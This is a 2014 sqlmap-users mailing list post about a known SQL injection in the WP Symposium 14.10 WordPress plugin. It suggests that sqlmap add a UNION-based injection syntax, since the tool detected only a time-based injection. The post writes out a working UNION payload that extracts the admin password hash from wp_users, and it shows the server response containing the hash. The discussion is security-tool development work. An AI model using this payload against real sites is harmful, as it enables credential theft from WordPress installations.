[sqlmap-users] WP Symposium 14.10 UNION-able, but sqlmap doesn't detect it
Brought to you by:
inquisb
Menu
▾
▴
[sqlmap-users] WP Symposium 14.10 UNION-able, but sqlmap doesn't detect it
|
From: Brandon P. <bpe...@gm...> - 2014-12-15 16:49:59
|
Hello! Playing around with the following vulnerabivlity: http://www.exploit-db.com/exploits/35505/ Using a payload such as 'action=getMailMessage&tray=in_deleted = 1 UNION (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- &mid=1' does result in a response from the server with the hash of the first user: 1[split]$P$BbXpOww1mX0g3gf5TxXz53Iu/S5ryu.[split]in_deleted = 1 UNION (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- [split] However, sqlmap only finds a time based injection. Looking at sqlmap through burp, I do see sqlmap doesn't try an injection syntax like the one used in the PoC. It may be useful to add a syntax of UNION (SELECT CONCAT(blah, blah, blah) FROM blah). Just a thought! -- http://volatile-minds.blogspot.com -- blog http://www.volatileminds.net -- website |
